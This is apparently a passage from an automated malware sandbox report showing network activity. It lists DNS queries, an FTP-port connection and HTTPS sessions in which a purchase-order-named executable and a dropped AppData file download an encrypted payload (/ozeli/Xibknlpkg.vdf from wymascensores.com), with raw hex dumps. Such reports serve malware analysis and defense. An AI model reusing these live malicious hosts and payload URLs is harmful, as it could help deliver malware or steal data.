Oct 4, 2024 10:41:35.100178003 CEST	49796	21	192.168.2.7	5.2.84.236

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 4, 2024 10:41:04.891171932 CEST	51343	53	192.168.2.7	1.1.1.1
Oct 4, 2024 10:41:05.106580973 CEST	53	51343	1.1.1.1	192.168.2.7
Oct 4, 2024 10:41:09.946068048 CEST	65188	53	192.168.2.7	1.1.1.1
Oct 4, 2024 10:41:10.064961910 CEST	53	65188	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 4, 2024 10:41:04.891171932 CEST	192.168.2.7	1.1.1.1	0x6ae9	Standard query (0)	wymascensores.com	A (IP address)	IN (0x0001)	false
Oct 4, 2024 10:41:09.946068048 CEST	192.168.2.7	1.1.1.1	0x4ae4	Standard query (0)	ftp.alternatifplastik.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 4, 2024 10:41:05.106580973 CEST	1.1.1.1	192.168.2.7	0x6ae9	No error (0)	wymascensores.com		67.212.175.162	A (IP address)	IN (0x0001)	false
Oct 4, 2024 10:41:10.064961910 CEST	1.1.1.1	192.168.2.7	0x4ae4	No error (0)	ftp.alternatifplastik.com		5.2.84.236	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

wymascensores.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49699	67.212.175.162	443	7288	C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-04 08:41:05 UTC	86	OUT	GET /ozeli/Xibknlpkg.vdf HTTP/1.1 Host: wymascensores.com Connection: Keep-Alive
2024-10-04 08:41:06 UTC	183	IN	HTTP/1.1 200 OK Date: Fri, 04 Oct 2024 08:41:05 GMT Server: Apache Last-Modified: Thu, 03 Oct 2024 06:37:33 GMT Accept-Ranges: bytes Content-Length: 955400 Connection: close
2024-10-04 08:41:06 UTC	8009	IN	Data Raw: 97 41 07 40 2b 6a 49 2d aa 8d a2 ed 3d af 51 63 04 96 5a 71 83 37 53 9d 78 f4 f9 8b a8 80 49 83 4c 69 6c a2 20 49 5b 8f 56 b7 4d 66 73 37 8b 10 43 7d d7 76 3a 63 e8 ac 0e 10 18 0e ea c9 a4 0f 51 e6 4f 05 55 36 58 e7 d6 4a 84 a1 06 29 66 f2 56 9a 1e 6a 69 c7 67 93 52 c9 d2 19 ab f2 61 46 32 c4 7a 36 e0 90 18 36 e0 d7 f1 fd 88 63 09 bb 87 19 98 e0 41 5c 52 09 85 2f 38 4a 21 74 a0 41 1e 4e 75 93 ca 45 f9 a6 a0 54 23 50 b2 da 56 1f b3 ae f0 9b db 86 18 99 01 57 1b 1a 71 5e 12 80 6f 35 ec ec 38 96 16 bc 3c ff 1d c8 e1 30 80 2b c5 e9 f6 01 20 0f 47 e9 8d 7c 2c b1 ed d3 fa 70 87 d2 6f 67 5d 08 99 54 71 98 8d ea 73 44 37 7d e7 c2 eb f4 e9 b0 37 a3 55 70 e5 ca 78 b7 3e 09 1c 1a c4 11 a6 88 43 90 95 be 81 e0 e0 35 91 05 27 60 51 a5 2f 91 3e ba e4 a3 27 08 1b 21 69 Data Ascii: A@+jI-=QcZq7SxILil I[VMfs7C}v:cQOU6XJ)fVjigRaF2z66cA\R/8J!tANuET#PVWq^o58<0+ G\|,pog]TqsD7}7Upx>C5'`Q/>'!i
2024-10-04 08:41:06 UTC	8000	IN	Data Raw: ee 2a 41 1b 0e f6 fd a1 be b9 69 9a af d3 d2 68 2c 9f 13 b3 9d 48 bc bb d2 33 f4 d3 a8 33 54 6c f2 e4 a2 a2 2d b0 6f 8b ad 2b 1b 43 31 e1 ae ef b5 76 e4 2f 1a 50 6c e2 1e 2e bc 6e d0 02 8c df 2f 3e 75 6b 28 e5 3d c0 a7 46 ac 7e 09 a0 58 42 5e 03 5e 93 29 62 62 3f 2d a2 b1 35 1c 06 25 0f c0 f5 6f 2b 38 a8 30 e5 ce a9 28 80 3c 8e cc 45 13 45 41 11 2a 41 77 2e ed 96 b0 32 9d 6c 5d 44 c7 85 9d 9e de 94 c0 d8 c8 15 98 86 de 72 90 5d 74 bf 5f 04 da e5 34 5b 84 36 4e 24 f6 9c 65 69 9f 40 e7 f7 bc 6b 5f 85 93 72 a0 1e 9e 04 17 5c 3b fb 95 b3 39 cc d9 a2 b3 9c 4c 32 b6 43 bd 8f f8 04 14 56 d6 f7 61 cc 7f f6 8e 65 d8 25 59 9d 6f b1 42 03 05 49 80 7a 1e 88 53 b1 c7 64 53 c1 99 12 db 73 bf 83 1a 8e 7b e4 95 67 35 d2 03 5e fb 5c 04 18 06 3b ea b3 96 f4 49 93 78 9f 87 Data Ascii: Aih,H33Tl-o+C1v/Pl.n/>uk(=F~XB^^)bb?-5%o+80(<EEAAw.2l]Dr]t_4[6N$ei@k_r\;9L2CVae%YoBIzSdSs{g5^\;Ix
2024-10-04 08:41:06 UTC	8000	IN	Data Raw: 8f d6 8f 5a 4c ff e9 6c a1 82 ca 26 92 bf 8a 01 93 58 9f a7 61 84 a9 30 57 b2 ca c9 19 59 3f 97 ab b0 36 17 b5 0c d1 05 88 7d ed 67 4e e8 c8 d1 6b ff a1 78 b9 58 7e e8 f1 50 09 a5 56 69 8c d8 51 9e 83 b6 61 ec 65 3d 72 06 c0 3e 48 d5 cc c7 cd 6a 2b 95 4d e3 bb 80 d8 58 a8 2d 9e a6 a1 bf aa 83 e7 d4 76 1d 3c c7 5f c5 d4 49 3f c8 9a 8f 47 f1 8c 58 8a f3 d7 14 9b 9c 97 08 7b f9 65 65 3c 93 29 ef 36 97 9b bf 5a d4 ff a3 c7 80 d2 0d 70 07 75 ff 03 19 7e 11 0f 48 02 46 51 db 41 11 5b 1f 4a 73 3e ed 1a 90 99 11 dc d2 56 8a 18 94 46 93 57 dd 61 90 28 94 03 b2 3d c7 a7 c0 a4 06 6e ab 02 58 a3 19 10 4d d4 9a cf b2 42 fc c9 b9 97 2f 10 aa e9 38 95 71 82 9f d1 f6 85 9c bb 55 d1 9d 9c 0d 51 86 92 46 be 12 4b 73 6b b6 87 f9 97 ac 47 87 f2 45 50 ba 19 5f 9b b4 a8 4b 58 Data Ascii: ZLl&Xa0WY?6}gNkxX~PViQae=r>Hj+MX-v<_I?GX{ee<)6Zpu~HFQA[Js>VFWa(=nXMB/8qUQFKskGEP_KX
2024-10-04 08:41:06 UTC	8000	IN	Data Raw: cf 2b 48 13 e4 ac b2 98 71 54 8e 0e a0 df d4 25 73 52 71 0a 01 08 25 15 e0 94 7d c9 3a 34 eb 8d a6 c3 d4 07 8c 62 ad a7 fe 26 63 01 71 3b ac d4 74 db a7 87 19 b0 39 7f a3 c3 d3 3c 28 c6 5f d7 d0 b1 65 9f a6 04 f8 7c 47 70 9e a9 d2 51 c4 af a1 74 a7 33 f9 0e 50 31 0c 1b fb a5 d2 76 b0 5f 1c 72 0b a5 81 03 7f c7 78 b2 34 43 26 10 3b e0 ea f1 96 6f b4 89 7e 0e f2 64 d4 69 e7 47 41 d2 eb 6c ac 8d da 49 2b de 35 ad 63 41 be 5f 06 e7 84 ff f9 47 c0 ec da 66 82 08 28 dc f1 84 b6 5a aa ea 22 cd f1 5a 34 94 91 c2 7f ad 53 93 de f6 69 4f d5 85 f0 e0 15 cc de 26 3f e6 7b 7e fb dd e9 41 08 3c 97 a1 79 64 6c c7 c3 a6 18 c6 3c 49 5b c1 e3 7c 34 c0 08 e6 71 2f db c4 62 f8 83 8c 81 30 5f 49 25 04 e2 96 c2 16 14 00 a4 e8 3b d3 a6 9c c1 4c e7 7e 8a 10 24 55 8c 5e 04 6d c9 Data Ascii: +HqT%sRq%}:4b&cq;t9<(_e\|GpQt3P1v_rx4C&;o~diGAlI+5cA_Gf(Z"Z4SiO&?{~A<ydl<I[\|4q/b0_I%;L~$U^m
2024-10-04 08:41:06 UTC	8000	IN	Data Raw: c3 14 2e 7d 82 ab 28 fb 80 79 1e f7 f0 94 f8 3e 43 0c 25 dd be 59 e7 9d cd 28 71 ef d9 48 c6 e3 7a 4f 53 99 1c 4c 41 c0 c4 60 ba 16 c5 22 67 76 5d 7e b2 e8 84 da 5b 97 9d df 78 47 73 e0 e1 eb b3 be 92 59 3c 73 3c bf 84 2a 8b 9a c8 d4 f4 8a d5 ac 3c 14 6b f6 cd b9 2e 8d 18 3a de 67 13 a6 da 1d c2 cf 03 78 1d 78 61 29 b9 7f c0 90 2b 5a 65 dc 02 d6 2d a9 5b 54 a0 0c 93 01 b5 94 4e 26 91 45 48 29 47 6a b4 c5 99 21 94 00 6d ce 89 3f 26 d4 71 b3 05 e6 39 b6 51 cd 3d 08 4b 58 7a 15 11 26 94 4c 3f 52 ee 2e d5 07 21 aa 25 68 62 46 cd 8d 3b 8d 2f 18 df 62 c8 8b a3 ac 0e bf d5 49 d6 b1 0e 10 02 e1 27 85 4c 5d 31 a0 f1 ed 93 1e 27 b5 89 dd e6 22 de 34 a8 56 a2 55 4e 6a d1 7e 99 08 7c 6d c3 c7 f2 35 48 f3 66 28 23 ba a1 4e 15 7b e0 eb d0 5b 1f 80 b5 12 93 04 08 b5 cf Data Ascii: .}(y>C%Y(qHzOSLA`"gv]~[xGsY<s<*<k.:gxxa)+Ze-[TN&EH)Gj!m?&q9Q=KXz&L?R.!%hbF;/bI'L]1'"4VUNj~\|m5Hf(#N{[
2024-10-04 08:41:06 UTC	8000	IN	Data Raw: aa 6a 6c 2c 50 36 96 db 3a 93 7d f5 6f 94 dc 27 f2 ba f0 6e 16 19 06 ca f4 e7 60 bf bd e6 4a 9e 6d 42 62 ff 8c 51 0c 6e 54 20 fd b1 01 af 28 61 bd b8 ce 39 e5 03 41 ea 07 6f 72 b8 c6 af c1 9f 92 6e bf a5 e8 2e 9c d4 0f e5 e1 23 4a f4 f3 be f7 c7 78 5e 5c 48 17 e5 9d 4f c3 fc 6f 03 20 81 3c e5 f7 ed e2 c0 61 e2 a8 8c 6d b9 1e 9d 1e 5c 82 8c 7a 8f 8e 41 63 2b 20 d1 e2 9f b8 9a 49 27 16 da 89 5f d4 70 20 9a ee a7 99 a3 7c 86 59 45 8c 06 44 ca e4 36 b5 25 ca ff cd 04 cb 7b ac 8c 26 97 70 7a 87 77 20 0b bd ed 2b cc 14 c0 4b dd de 9c 46 8f c8 f2 f2 8e 6c fd 1b 36 fa 3e 65 f9 a5 4e 15 71 55 b9 cb b1 f1 29 86 96 17 c1 8f 14 f8 7d 5e 90 68 bc 91 21 25 c0 5e 6e d1 b2 69 db c9 26 b3 e6 ba ab b0 68 4e c6 3c 9d db e2 a2 9a 57 e3 dc ee 43 d7 fd 1f 84 b6 5f 83 4d 5e 67 Data Ascii: jl,P6:}o'n`JmBbQnT (a9Aorn.#Jx^\HOo <am\zAc+ I'_p \|YED6%{&pzw +KFl6>eNqU)}^h!%^ni&hN<WC_M^g
2024-10-04 08:41:06 UTC	8000	IN	Data Raw: 43 dd 9f 7e 9c 3d d9 be a0 1f 94 4c b4 fe 52 ef 6a 2c 70 7a e3 15 24 9d fb 2c 16 cf 8e 99 d5 c5 cf 9c 22 38 7f 08 e9 43 3b 9f d7 c7 07 53 79 84 cc 34 ed 07 85 15 03 66 eb d3 d5 9b 3c e4 50 41 5c 7c df 85 9f ea eb 59 48 cf 7b 7a a4 22 fb 08 da 35 a9 69 40 b3 da 6e 13 93 64 7a ff a0 36 b0 1d cf 09 ce 68 57 e9 20 b0 1f ee 3d d0 60 43 b4 5a 20 8e 70 64 98 a7 85 c6 67 e7 6e c5 ba 93 dd 15 f2 a1 98 93 07 7f 57 fc e4 6e ce b9 35 38 e5 f6 c7 dd d7 2d 8d 58 70 1c ea d7 41 09 e1 51 23 d7 29 bd c7 e7 d7 55 1a 24 be 8d 0d 96 99 46 25 22 20 41 77 ee cf 41 6a a3 63 d8 fc e7 37 eb 91 2a 4b 8c b5 fd cc cc 14 83 3f 4b c3 ee 8b cb b9 03 38 7d 0a 80 a1 93 ed 4c 54 f7 d2 d0 0c f8 71 ab b0 33 16 1e 6b f7 9e 99 ae 4b 58 09 ce 14 3f 71 20 a6 e6 64 94 d7 90 97 0a f6 28 3c ae f7 Data Ascii: C~=LRj,pz$,"8C;Sy4f<PA\\|YH{z"5i@ndz6hW =`CZ pdgnWn58-XpAQ#)U$F%" AwAjc7*K?K8}LTq3kKX?q d(<
2024-10-04 08:41:06 UTC	8000	IN	Data Raw: 34 51 57 d6 6a 59 e4 85 2b 89 89 87 30 72 99 f1 0c 97 ca 0f da dc d9 78 86 4a c3 22 82 22 8b 5e 29 e8 8a c8 0b 40 06 9c 71 a9 1b fd 97 8f b7 6f 1f d6 d1 03 a2 ac c2 23 4c 55 6e c4 b2 a7 7c fb 25 d3 b2 08 61 9b 3c b6 d6 4a 46 c1 44 f9 2a 12 53 eb b4 f5 c6 f5 cb db 58 b7 21 ee 9a dc 37 e0 68 33 a0 43 0a 09 80 07 f8 7e 51 71 a4 85 63 52 a9 aa e4 4e 3c 2f 50 d3 8f 6e e7 bc 5c 1e d6 7b f8 8f 09 64 bb 97 4b dd 39 96 67 65 9e 18 82 b5 80 4b 0e f8 99 96 d8 bb 56 a5 f1 1c 22 e1 6f 4a a2 06 52 80 26 4d 4d 71 99 6a 7d 00 54 e0 ed 0c 5f b3 dc ca 6d b2 96 5d db 6e 4a fd 1a 40 95 b7 ba ee eb b1 aa 92 ac f8 cf 90 32 02 2f ee 83 8b a1 e9 d3 05 0b e9 6a 65 6e 74 d2 6c f6 a0 6c ff 5b 84 2a a4 9a 5d e3 10 22 ae 40 67 30 0c 75 f1 59 d1 b8 b3 22 41 4e 91 b0 ce f5 0e 7e 5d ea Data Ascii: 4QWjY+0rxJ""^)@qo#LUn\|%a<JFDSX!7h3C~QqcRN</Pn\{dK9geKV"oJR&MMqj}T_m]nJ@2/jentll[]"@g0uY"AN~]
2024-10-04 08:41:06 UTC	8000	IN	Data Raw: f9 9c 5f 37 dc 28 7b 3f 05 d7 f3 80 4e 90 02 23 ca e6 56 c5 57 6e 1d 63 3f ea e1 84 8c cb 6c d8 ce d1 bf 5e 71 43 20 7b 2d 50 5e f7 2c bb e0 35 30 82 9e 24 ee 14 4b b8 dc 3b 73 43 8d fe 82 40 d5 4f c5 eb f1 6c fa 80 57 52 f7 22 a6 1d 15 b2 8e 03 23 46 d3 b0 70 c4 e0 52 77 6a f9 3a 5d a4 01 36 04 94 39 af 99 14 8d 1f a4 1b e8 8f 6c 91 d8 04 8b e8 24 04 74 6b 08 ef 50 2c 2d 5e 46 35 d6 86 30 b8 e5 37 da 12 d6 f5 9c 9e 44 28 8b 10 bb 69 3b 06 0f 4b f4 bc d8 03 bb ad d5 2d dc 51 2b b4 bc 10 ea d9 ed 99 71 10 d0 1a d1 fb df a3 24 8e 00 28 02 d9 cb ca 6e f4 ea 35 1b 04 cf b8 ee 92 6d 51 d0 23 ea 26 63 32 1a cb c3 9f 7f bc 15 29 8a f8 83 97 0b 36 de e0 2a c6 f7 f6 85 20 53 ad f8 11 2f bc 3e 97 42 ab 27 0d eb 52 ad bb ac de 9d 5b d1 9d ab ff 57 a6 8e 59 90 ce b8 Data Ascii: _7({?N#VWnc?l^qC {-P^,50$K;sC@OlWR"#FpRwj:]69l$tkP,-^F507D(i;K-Q+q$(n5mQ#&c2)6* S/>B'R[WY
2024-10-04 08:41:06 UTC	8000	IN	Data Raw: 05 fe de fe 46 da 07 eb c8 c7 01 a8 e9 3f 18 78 9d 35 b9 39 1b ec 68 f3 fa f8 59 fe 36 74 23 5e 13 56 aa 2d c8 ad 05 94 31 27 43 f4 b3 e1 64 a7 ae dc 94 68 8b 73 ef db ea 03 38 43 01 56 3a cc 54 27 50 83 d2 ea 8f 96 21 ed e0 75 f7 72 d4 30 e7 c5 18 d8 06 ac e8 bb c4 72 43 47 43 67 05 55 ad e2 0c 69 c3 b5 6f fe 15 ac eb ce 55 d2 f8 3b 90 b2 9a 00 36 8d b8 f1 8b 24 e4 0f 24 ce 38 8c 91 20 ae 5b 88 e3 bf c3 38 dd 07 a9 cb 6a fe d8 84 c5 66 18 95 ec f4 70 c2 be 2e 01 0b e3 36 c7 5c c3 50 0e 2f cc 38 e7 c3 f8 1b a2 37 6e d4 fe 78 90 b2 60 3c 57 dc 29 91 5d 95 04 97 57 c5 c0 61 cf 56 ac 3b 23 a1 81 6a 3e 2b 66 54 07 b5 cf 6b 4f 9e 00 3d 1a 5a 00 74 8d de 1f f6 0c eb d9 25 8d 80 55 73 a9 ed 75 0d 81 17 a7 49 b0 25 d1 a3 37 81 07 2d 61 16 08 83 75 b2 e3 da 48 f9 Data Ascii: F?x59hY6t#^V-1'Cdhs8CV:T'P!ur0rCGCgUioU;6$$8 [8jfp.6\P/87nx`<W)]WaV;#j>+fTkO=Zt%UsuI%7-auH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49718	67.212.175.162	443	8044	C:\Users\user\AppData\Roaming\Iujcy.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-04 08:41:17 UTC	86	OUT	GET /ozeli/Xibknlpkg.vdf HTTP/1.1 Host: wymascensores.com Connection: Keep-Alive
2024-10-04 08:41:17 UTC	183	IN	HTTP/1.1 200 OK Date: Fri, 04 Oct 2024 08:41:16 GMT Server: Apache Last-Modified: Thu, 03 Oct 2024 06:37:33 GMT Accept-Ranges: bytes Content-Length: 955400 Connection: close
2024-10-04 08:41:17 UTC	8009	IN	Data Raw: 97 41 07 40 2b 6a 49 2d aa 8d a2 ed 3d af 51 63 04 96 5a 71 83 37 53 9d 78 f4 f9 8b a8 80 49 83 4c 69 6c a2 20 49 5b 8f 56 b7 4d 66 73 37 8b 10 43 7d d7 76 3a 63 e8 ac 0e 10 18 0e ea c9 a4 0f 51 e6 4f 05 55 36 58 e7 d6 4a 84 a1 06 29 66 f2 56 9a 1e 6a 69 c7 67 93 52 c9 d2 19 ab f2 61 46 32 c4 7a 36 e0 90 18 36 e0 d7 f1 fd 88 63 09 bb 87 19 98 e0 41 5c 52 09 85 2f 38 4a 21 74 a0 41 1e 4e 75 93 ca 45 f9 a6 a0 54 23 50 b2 da 56 1f b3 ae f0 9b db 86 18 99 01 57 1b 1a 71 5e 12 80 6f 35 ec ec 38 96 16 bc 3c ff 1d c8 e1 30 80 2b c5 e9 f6 01 20 0f 47 e9 8d 7c 2c b1 ed d3 fa 70 87 d2 6f 67 5d 08 99 54 71 98 8d ea 73 44 37 7d e7 c2 eb f4 e9 b0 37 a3 55 70 e5 ca 78 b7 3e 09 1c 1a c4 11 a6 88 43 90 95 be 81 e0 e0 35 91 05 27 60 51 a5 2f 91 3e ba e4 a3 27 08 1b 21 69 Data Ascii: A@+jI-=QcZq7SxILil I[VMfs7C}v:cQOU6XJ)fVjigRaF2z66cA\R/8J!tANuET#PVWq^o58<0+ G\|,pog]TqsD7}7Upx>C5'`Q/>'!i
2024-10-04 08:41:17 UTC	8000	IN	Data Raw: ee 2a 41 1b 0e f6 fd a1 be b9 69 9a af d3 d2 68 2c 9f 13 b3 9d 48 bc bb d2 33 f4 d3 a8 33 54 6c f2 e4 a2 a2 2d b0 6f 8b ad 2b 1b 43 31 e1 ae ef b5 76 e4 2f 1a 50 6c e2 1e 2e bc 6e d0 02 8c df 2f 3e 75 6b 28 e5 3d c0 a7 46 ac 7e 09 a0 58 42 5e 03 5e 93 29 62 62 3f 2d a2 b1 35 1c 06 25 0f c0 f5 6f 2b 38 a8 30 e5 ce a9 28 80 3c 8e cc 45 13 45 41 11 2a 41 77 2e ed 96 b0 32 9d 6c 5d 44 c7 85 9d 9e de 94 c0 d8 c8 15 98 86 de 72 90 5d 74 bf 5f 04 da e5 34 5b 84 36 4e 24 f6 9c 65 69 9f 40 e7 f7 bc 6b 5f 85 93 72 a0 1e 9e 04 17 5c 3b fb 95 b3 39 cc d9 a2 b3 9c 4c 32 b6 43 bd 8f f8 04 14 56 d6 f7 61 cc 7f f6 8e 65 d8 25 59 9d 6f b1 42 03 05 49 80 7a 1e 88 53 b1 c7 64 53 c1 99 12 db 73 bf 83 1a 8e 7b e4 95 67 35 d2 03 5e fb 5c 04 18 06 3b ea b3 96 f4 49 93 78 9f 87 Data Ascii: Aih,H33Tl-o+C1v/Pl.n/>uk(=F~XB^^)bb?-5%o+80(<EEAAw.2l]Dr]t_4[6N$ei@k_r\;9L2CVae%YoBIzSdSs{g5^\;Ix
2024-10-04 08:41:17 UTC	8000	IN	Data Raw: 8f d6 8f 5a 4c ff e9 6c a1 82 ca 26 92 bf 8a 01 93 58 9f a7 61 84 a9 30 57 b2 ca c9 19 59 3f 97 ab b0 36 17 b5 0c d1 05 88 7d ed 67 4e e8 c8 d1 6b ff a1 78 b9 58 7e e8 f1 50 09 a5 56 69 8c d8 51 9e 83 b6 61 ec 65 3d 72 06 c0 3e 48 d5 cc c7 cd 6a 2b 95 4d e3 bb 80 d8 58 a8 2d 9e a6 a1 bf aa 83 e7 d4 76 1d 3c c7 5f c5 d4 49 3f c8 9a 8f 47 f1 8c 58 8a f3 d7 14 9b 9c 97 08 7b f9 65 65 3c 93 29 ef 36 97 9b bf 5a d4 ff a3 c7 80 d2 0d 70 07 75 ff 03 19 7e 11 0f 48 02 46 51 db 41 11 5b 1f 4a 73 3e ed 1a 90 99 11 dc d2 56 8a 18 94 46 93 57 dd 61 90 28 94 03 b2 3d c7 a7 c0 a4 06 6e ab 02 58 a3 19 10 4d d4 9a cf b2 42 fc c9 b9 97 2f 10 aa e9 38 95 71 82 9f d1 f6 85 9c bb 55 d1 9d 9c 0d 51 86 92 46 be 12 4b 73 6b b6 87 f9 97 ac 47 87 f2 45 50 ba 19 5f 9b b4 a8 4b 58 Data Ascii: ZLl&Xa0WY?6}gNkxX~PViQae=r>Hj+MX-v<_I?GX{ee<)6Zpu~HFQA[Js>VFWa(=nXMB/8qUQFKskGEP_KX
2024-10-04 08:41:17 UTC	8000	IN	Data Raw: cf 2b 48 13 e4 ac b2 98 71 54 8e 0e a0 df d4 25 73 52 71 0a 01 08 25 15 e0 94 7d c9 3a 34 eb 8d a6 c3 d4 07 8c 62 ad a7 fe 26 63 01 71 3b ac d4 74 db a7 87 19 b0 39 7f a3 c3 d3 3c 28 c6 5f d7 d0 b1 65 9f a6 04 f8 7c 47 70 9e a9 d2 51 c4 af a1 74 a7 33 f9 0e 50 31 0c 1b fb a5 d2 76 b0 5f 1c 72 0b a5 81 03 7f c7 78 b2 34 43 26 10 3b e0 ea f1 96 6f b4 89 7e 0e f2 64 d4 69 e7 47 41 d2 eb 6c ac 8d da 49 2b de 35 ad 63 41 be 5f 06 e7 84 ff f9 47 c0 ec da 66 82 08 28 dc f1 84 b6 5a aa ea 22 cd f1 5a 34 94 91 c2 7f ad 53 93 de f6 69 4f d5 85 f0 e0 15 cc de 26 3f e6 7b 7e fb dd e9 41 08 3c 97 a1 79 64 6c c7 c3 a6 18 c6 3c 49 5b c1 e3 7c 34 c0 08 e6 71 2f db c4 62 f8 83 8c 81 30 5f 49 25 04 e2 96 c2 16 14 00 a4 e8 3b d3 a6 9c c1 4c e7 7e 8a 10 24 55 8c 5e 04 6d c9 Data Ascii: +HqT%sRq%}:4b&cq;t9<(_e\|GpQt3P1v_rx4C&;o~diGAlI+5cA_Gf(Z"Z4SiO&?{~A<ydl<I[\|4q/b0_I%;L~$U^m
2024-10-04 08:41:17 UTC	8000	IN	Data Raw: c3 14 2e 7d 82 ab 28 fb 80 79 1e f7 f0 94 f8 3e 43 0c 25 dd be 59 e7 9d cd 28 71 ef d9 48 c6 e3 7a 4f 53 99 1c 4c 41 c0 c4 60 ba 16 c5 22 67 76 5d 7e b2 e8 84 da 5b 97 9d df 78 47 73 e0 e1 eb b3 be 92 59 3c 73 3c bf 84 2a 8b 9a c8 d4 f4 8a d5 ac 3c 14 6b f6 cd b9 2e 8d 18 3a de 67 13 a6 da 1d c2 cf 03 78 1d 78 61 29 b9 7f c0 90 2b 5a 65 dc 02 d6 2d a9 5b 54 a0 0c 93 01 b5 94 4e 26 91 45 48 29 47 6a b4 c5 99 21 94 00 6d ce 89 3f 26 d4 71 b3 05 e6 39 b6 51 cd 3d 08 4b 58 7a 15 11 26 94 4c 3f 52 ee 2e d5 07 21 aa 25 68 62 46 cd 8d 3b 8d 2f 18 df 62 c8 8b a3 ac 0e bf d5 49 d6 b1 0e 10 02 e1 27 85 4c 5d 31 a0 f1 ed 93 1e 27 b5 89 dd e6 22 de 34 a8 56 a2 55 4e 6a d1 7e 99 08 7c 6d c3 c7 f2 35 48 f3 66 28 23 ba a1 4e 15 7b e0 eb d0 5b 1f 80 b5 12 93 04 08 b5 cf Data Ascii: .}(y>C%Y(qHzOSLA`"gv]~[xGsY<s<*<k.:gxxa)+Ze-[TN&EH)Gj!m?&q9Q=KXz&L?R.!%hbF;/bI'L]1'"4VUNj~\|m5Hf(#N{[
2024-10-04 08:41:17 UTC	8000	IN	Data Raw: aa 6a 6c 2c 50 36 96 db 3a 93 7d f5 6f 94 dc 27 f2 ba f0 6e 16 19 06 ca f4 e7 60 bf bd e6 4a 9e 6d 42 62 ff 8c 51 0c 6e 54 20 fd b1 01 af 28 61 bd b8 ce 39 e5 03 41 ea 07 6f 72 b8 c6 af c1 9f 92 6e bf a5 e8 2e 9c d4 0f e5 e1 23 4a f4 f3 be f7 c7 78 5e 5c 48 17 e5 9d 4f c3 fc 6f 03 20 81 3c e5 f7 ed e2 c0 61 e2 a8 8c 6d b9 1e 9d 1e 5c 82 8c 7a 8f 8e 41 63 2b 20 d1 e2 9f b8 9a 49 27 16 da 89 5f d4 70 20 9a ee a7 99 a3 7c 86 59 45 8c 06 44 ca e4 36 b5 25 ca ff cd 04 cb 7b ac 8c 26 97 70 7a 87 77 20 0b bd ed 2b cc 14 c0 4b dd de 9c 46 8f c8 f2 f2 8e 6c fd 1b 36 fa 3e 65 f9 a5 4e 15 71 55 b9 cb b1 f1 29 86 96 17 c1 8f 14 f8 7d 5e 90 68 bc 91 21 25 c0 5e 6e d1 b2 69 db c9 26 b3 e6 ba ab b0 68 4e c6 3c 9d db e2 a2 9a 57 e3 dc ee 43 d7 fd 1f 84 b6 5f 83 4d 5e 67 Data Ascii: jl,P6:}o'n`JmBbQnT (a9Aorn.#Jx^\HOo <am\zAc+ I'_p \|YED6%{&pzw +KFl6>eNqU)}^h!%^ni&hN<WC_M^g
2024-10-04 08:41:18 UTC	8000	IN	Data Raw: 43 dd 9f 7e 9c 3d d9 be a0 1f 94 4c b4 fe 52 ef 6a 2c 70 7a e3 15 24 9d fb 2c 16 cf 8e 99 d5 c5 cf 9c 22 38 7f 08 e9 43 3b 9f d7 c7 07 53 79 84 cc 34 ed 07 85 15 03 66 eb d3 d5 9b 3c e4 50 41 5c 7c df 85 9f ea eb 59 48 cf 7b 7a a4 22 fb 08 da 35 a9 69 40 b3 da 6e 13 93 64 7a ff a0 36 b0 1d cf 09 ce 68 57 e9 20 b0 1f ee 3d d0 60 43 b4 5a 20 8e 70 64 98 a7 85 c6 67 e7 6e c5 ba 93 dd 15 f2 a1 98 93 07 7f 57 fc e4 6e ce b9 35 38 e5 f6 c7 dd d7 2d 8d 58 70 1c ea d7 41 09 e1 51 23 d7 29 bd c7 e7 d7 55 1a 24 be 8d 0d 96 99 46 25 22 20 41 77 ee cf 41 6a a3 63 d8 fc e7 37 eb 91 2a 4b 8c b5 fd cc cc 14 83 3f 4b c3 ee 8b cb b9 03 38 7d 0a 80 a1 93 ed 4c 54 f7 d2 d0 0c f8 71 ab b0 33 16 1e 6b f7 9e 99 ae 4b 58 09 ce 14 3f 71 20 a6 e6 64 94 d7 90 97 0a f6 28 3c ae f7 Data Ascii: C~=LRj,pz$,"8C;Sy4f<PA\\|YH{z"5i@ndz6hW =`CZ pdgnWn58-XpAQ#)U$F%" AwAjc7*K?K8}LTq3kKX?q d(<
2024-10-04 08:41:18 UTC	8000	IN	Data Raw: 34 51 57 d6 6a 59 e4 85 2b 89 89 87 30 72 99 f1 0c 97 ca 0f da dc d9 78 86 4a c3 22 82 22 8b 5e 29 e8 8a c8 0b 40 06 9c 71 a9 1b fd 97 8f b7 6f 1f d6 d1 03 a2 ac c2 23 4c 55 6e c4 b2 a7 7c fb 25 d3 b2 08 61 9b 3c b6 d6 4a 46 c1 44 f9 2a 12 53 eb b4 f5 c6 f5 cb db 58 b7 21 ee 9a dc 37 e0 68 33 a0 43 0a 09 80 07 f8 7e 51 71 a4 85 63 52 a9 aa e4 4e 3c 2f 50 d3 8f 6e e7 bc 5c 1e d6 7b f8 8f 09 64 bb 97 4b dd 39 96 67 65 9e 18 82 b5 80 4b 0e f8 99 96 d8 bb 56 a5 f1 1c 22 e1 6f 4a a2 06 52 80 26 4d 4d 71 99 6a 7d 00 54 e0 ed 0c 5f b3 dc ca 6d b2 96 5d db 6e 4a fd 1a 40 95 b7 ba ee eb b1 aa 92 ac f8 cf 90 32 02 2f ee 83 8b a1 e9 d3 05 0b e9 6a 65 6e 74 d2 6c f6 a0 6c ff 5b 84 2a a4 9a 5d e3 10 22 ae 40 67 30 0c 75 f1 59 d1 b8 b3 22 41 4e 91 b0 ce f5 0e 7e 5d ea Data Ascii: 4QWjY+0rxJ""^)@qo#LUn\|%a<JFDSX!7h3C~QqcRN</Pn\{dK9geKV"oJR&MMqj}T_m]nJ@2/jentll[]"@g0uY"AN~]
